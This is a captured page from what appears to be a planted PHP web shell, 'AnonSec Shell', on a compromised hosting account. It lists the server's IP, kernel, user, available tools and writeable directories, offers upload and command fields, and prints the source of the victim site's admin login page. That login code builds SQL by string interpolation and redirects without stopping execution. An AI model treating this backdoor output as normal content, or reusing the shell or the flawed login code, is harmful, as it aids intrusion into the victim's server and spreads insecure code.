AnonSec Shell
Server IP : 149.202.105.228  /  Your IP : 216.73.216.18
Web Server : Apache
System : Linux webm129.cluster030.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
User : atfycaf ( 116275)
PHP Version : 7.4.33
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/atfycaf/www/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/atfycaf/www/admin/index.php
<?php
include "globalVars.php";
$thisIP			= $_SERVER['REMOTE_ADDR'];
$dateNow		= date("Y-m-d");
$dateTimeNow	= date("Y-m-d H:i:s");

$ipQuery = mysqli_query($conn, "SELECT releaseDateTime FROM admin_blocked WHERE ipAddress = '$thisIP' AND (releaseDateTime >= '$dateTimeNow')") or die (mysqli_error($conn));
if (mysqli_num_rows($ipQuery) > 0) {
	header("Location: https://www.google.com/");
}
$ipDupQuery = mysqli_query($conn, "SELECT id, loginCount FROM admin_blockedUserSessions WHERE ipAddress = '$thisIP' AND (loggedDate = '$dateNow')");
if (mysqli_num_rows($ipDupQuery) > 0) {
	while ($iDQ = mysqli_fetch_array($ipDupQuery)) {
		$ipID						= $iDQ["id"];
		$_SESSION["SESSION_lIC"]	= $iDQ["loginCount"];
	}
}
if (isset($_SESSION["SESSION_lIC"])) {
	if ($_SESSION["SESSION_lIC"] >= 5) {
		header("Location: https://www.google.com/");
	}
}
$_SESSION["SESSION_lIU"]	= getRandID(40);
$loginVar					= $_SESSION["SESSION_lIU"];

include "header.php";

?>

			<div class="memLoginContainer">
				<h1>Login</h1>
				<?php
				if (isset($_SESSION["SESSION_lIC"])) {
					settype($_SESSION["SESSION_lIC"], "integer");
					$triesLeft	= 5 - $_SESSION["SESSION_lIC"];
					echo "<p";
					if ($triesLeft <= 2) {
						echo " class=\"memLoginWarning\"";
					}
					echo "><strong>You have $triesLeft login attempts left.</strong></p>";
				}
				if (isset($_SESSION['loginError'])) {
					echo "<p><strong>". $_SESSION['loginError'] ."</strong></p>";
					unset($_SESSION['loginError']);
				}
				?>
				<form action="login.php" method="post">
					<input type="hidden" name="pageID" value="<?php echo $loginVar ?>">
					<div class="formInput">
						<input type="text" name="loginUser" required>
						<div class="formLabel">
							<label class="labelName">Username</label>
						</div>
					</div>
					<div class="formInput">
						<input type="password" name="loginPass" required>
						<div class="formLabel">
							<label class="labelName">Password</label>
						</div>
					</div>
					<button id="memLoginAC">Login</button>
				</form>
			</div>

<?php
include "footer.php";
?>

Anon7 - 2022
AnonSec Team